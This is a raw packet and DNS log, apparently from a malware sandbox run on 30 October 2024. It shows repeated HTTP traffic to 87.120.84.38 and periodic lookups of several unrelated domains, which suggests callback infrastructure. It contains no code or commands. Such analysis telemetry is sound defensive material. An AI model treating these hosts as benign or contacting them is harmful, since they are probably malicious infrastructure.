                                                                                                                                                                                  Oct 30, 2024 08:37:30.407799959 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407814980 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407845020 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407859087 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407865047 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407875061 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407896996 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407917023 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407932997 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407978058 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407979012 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.407994986 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418893099 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418895006 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418910980 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418910980 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418927908 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418934107 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418942928 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418955088 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418960094 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418972015 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418976068 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418987036 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.418992043 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419006109 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419008017 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419025898 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419027090 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419042110 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419045925 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419064999 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419080019 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.419121027 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420134068 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420198917 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420238018 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420253038 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420268059 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420284033 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420284033 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420300007 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420305014 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420316935 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420320988 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420340061 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420342922 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420356989 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420361042 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420372963 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420386076 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420388937 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420398951 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420407057 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420418978 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420422077 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420439005 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420439005 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420461893 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420478106 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.420550108 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.421828985 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.421844959 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.421860933 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.421885014 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.421905041 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.421963930 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.421988010 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422003031 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422013998 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422019005 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422034025 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422034979 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422049046 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422055960 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422064066 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422075033 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422080040 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422089100 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422096014 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422108889 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422111988 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422120094 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422127008 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422146082 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422167063 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422221899 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422616005 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422632933 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422647953 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422672033 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422672987 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422688961 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422700882 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422705889 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422713041 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422724009 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422730923 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422756910 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422766924 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422816992 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422832012 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422847986 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422862053 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422863960 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422875881 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422883034 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422899008 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422902107 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422914982 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422914982 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422935009 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422941923 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422962904 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422967911 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422983885 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.422986984 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423001051 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423006058 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423017979 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423023939 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423033953 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423044920 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423052073 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.423055887 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584242105 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584243059 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584264994 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584304094 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584336996 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584398985 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584481955 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584497929 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584513903 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584531069 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584544897 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584547043 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584563017 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584566116 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584577084 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584593058 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584597111 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584598064 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584609032 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584625959 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584628105 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584628105 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584646940 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584666014 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584686995 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584745884 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584762096 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584785938 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584789038 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584801912 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584809065 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584826946 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584826946 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584841967 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584851980 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584867001 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584872961 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584882975 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584888935 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584897041 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584908009 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584911108 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584928036 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584938049 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584945917 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584954023 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584965944 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584969997 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584986925 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584990025 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.584990025 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585000992 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585011005 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585024118 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585027933 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585040092 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585045099 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585055113 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585071087 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585073948 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585089922 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585095882 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585095882 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585105896 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585118055 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585128069 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585134983 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585151911 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585151911 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585167885 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585167885 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585184097 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585185051 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585196972 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585208893 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585212946 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585226059 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585230112 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585242987 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585246086 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585258961 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585263968 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585275888 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585279942 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585293055 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585298061 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585309982 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585314035 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585325956 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585340977 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585355997 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585361004 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585361004 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585372925 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585380077 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585386038 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585401058 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585402012 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585417032 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585428953 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585428953 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585431099 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585445881 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585448027 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585464001 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585464001 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585478067 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585488081 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585494041 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585508108 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585520029 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585520029 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.585532904 CET804916387.120.84.38192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589876890 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.589914083 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:37:30.790705919 CET4916380192.168.2.2287.120.84.38
                                                                                                                                                                                  Oct 30, 2024 08:38:51.204629898 CET4916480192.168.2.2213.248.213.45
                                                                                                                                                                                  Oct 30, 2024 08:38:51.210174084 CET804916413.248.213.45192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:38:51.210251093 CET4916480192.168.2.2213.248.213.45
                                                                                                                                                                                  Oct 30, 2024 08:38:51.210309982 CET4916480192.168.2.2213.248.213.45
                                                                                                                                                                                  Oct 30, 2024 08:38:51.216156006 CET804916413.248.213.45192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:38:51.849329948 CET804916413.248.213.45192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:38:51.849509954 CET4916480192.168.2.2213.248.213.45
                                                                                                                                                                                  Oct 30, 2024 08:38:51.849716902 CET804916413.248.213.45192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:38:51.849816084 CET4916480192.168.2.2213.248.213.45
                                                                                                                                                                                  Oct 30, 2024 08:38:51.854948044 CET804916413.248.213.45192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:40:33.913908005 CET4916580192.168.2.2268.66.226.117
                                                                                                                                                                                  Oct 30, 2024 08:40:33.925524950 CET804916568.66.226.117192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:40:33.925584078 CET4916580192.168.2.2268.66.226.117
                                                                                                                                                                                  Oct 30, 2024 08:40:33.925651073 CET4916580192.168.2.2268.66.226.117
                                                                                                                                                                                  Oct 30, 2024 08:40:33.931358099 CET804916568.66.226.117192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:40:34.559539080 CET804916568.66.226.117192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:40:34.560085058 CET4916580192.168.2.2268.66.226.117
                                                                                                                                                                                  Oct 30, 2024 08:40:34.566612959 CET804916568.66.226.117192.168.2.22
                                                                                                                                                                                  Oct 30, 2024 08:40:34.568079948 CET4916580192.168.2.2268.66.226.117
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 08:38:11.549665928 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Oct 30, 2024 08:38:11.560230017 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Oct 30, 2024 08:38:31.831712961 CET | 52917 | 53 | 192.168.2.22 | 8.8.8.8
Oct 30, 2024 08:38:31.842817068 CET | 53 | 52917 | 8.8.8.8 | 192.168.2.22
Oct 30, 2024 08:38:51.190649033 CET | 62751 | 53 | 192.168.2.22 | 8.8.8.8
Oct 30, 2024 08:38:51.202903986 CET | 53 | 62751 | 8.8.8.8 | 192.168.2.22
Oct 30, 2024 08:39:11.313864946 CET | 57893 | 53 | 192.168.2.22 | 8.8.8.8
Oct 30, 2024 08:39:11.327434063 CET | 53 | 57893 | 8.8.8.8 | 192.168.2.22
Oct 30, 2024 08:39:52.711354017 CET | 54821 | 53 | 192.168.2.22 | 8.8.8.8
Oct 30, 2024 08:39:52.721528053 CET | 53 | 54821 | 8.8.8.8 | 192.168.2.22
Oct 30, 2024 08:40:12.888900042 CET | 54719 | 53 | 192.168.2.22 | 8.8.8.8
Oct 30, 2024 08:40:13.004703999 CET | 53 | 54719 | 8.8.8.8 | 192.168.2.22
Oct 30, 2024 08:40:33.900860071 CET | 49881 | 53 | 192.168.2.22 | 8.8.8.8
Oct 30, 2024 08:40:33.913568974 CET | 53 | 49881 | 8.8.8.8 | 192.168.2.22
Oct 30, 2024 08:40:53.956487894 CET | 54998 | 53 | 192.168.2.22 | 8.8.8.8
Oct 30, 2024 08:40:53.969841957 CET | 53 | 54998 | 8.8.8.8 | 192.168.2.22
Oct 30, 2024 08:41:16.195372105 CET | 52781 | 53 | 192.168.2.22 | 8.8.8.8
Oct 30, 2024 08:41:16.237962008 CET | 53 | 52781 | 8.8.8.8 | 192.168.2.22
Oct 30, 2024 08:41:36.174273968 CET | 63926 | 53 | 192.168.2.22 | 8.8.8.8
Oct 30, 2024 08:41:36.245017052 CET | 53 | 63926 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 30, 2024 08:38:11.549665928 CET | 192.168.2.22 | 8.8.8.8 | 0x622a | Standard query (0) | www.education2jobs.com | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:38:31.831712961 CET | 192.168.2.22 | 8.8.8.8 | 0xa59f | Standard query (0) | www.lifeofthobes.uk | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:38:51.190649033 CET | 192.168.2.22 | 8.8.8.8 | 0x575c | Standard query (0) | www.thecareskin.com | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:39:11.313864946 CET | 192.168.2.22 | 8.8.8.8 | 0xebec | Standard query (0) | www.opmk.monster | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:39:52.711354017 CET | 192.168.2.22 | 8.8.8.8 | 0x15a2 | Standard query (0) | www.affirmationtotebags.com | A (IP address) | IN (0x0001) | false
